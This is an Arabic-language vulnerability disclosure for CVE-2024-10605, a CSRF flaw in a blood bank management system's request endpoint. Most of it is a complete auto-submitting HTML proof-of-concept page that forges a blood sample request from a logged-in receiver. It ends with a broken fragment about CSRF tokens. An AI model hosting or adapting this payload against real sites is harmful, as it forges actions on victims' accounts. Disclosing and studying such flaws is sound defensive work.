
إثبات المفهوم لـ CVE-2024-10605، ثغرة تزوير الطلبات عبر المواقع (CSRF) في نظام إدارة بنك الدم الإصدار 1.0 تسمح بطلبات عينات دم غير مصرح بها.
file/request.phpتوجد ثغرة تزوير الطلبات عبر المواقع (CSRF) في نقطة النهاية /file/request.php، والتي تسمح لمستخدم بعيد بتقديم طلب blood sample على حساب receiver الذي قام بتسجيل الدخول، من عينة الدم المتاحة لمستشفى مختار.
يمكن أن يؤدي الاستغلال الناجح إلى إجراءات غير مصرح بها نيابةً عن الضحية. بالإضافة إلى ذلك، يمكن استغلال هذه الثغرة من خلال زيارة مواقع ويب ضارة تحتوي على الحمولة (Payload).
فيما يلي مثال على هجوم إثبات المفهوم (PoC) الخاص بـ CSRF يبدأ طلب blood sample من حساب receiver's المسجّل دخوله:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
csrf tokens في طلبك.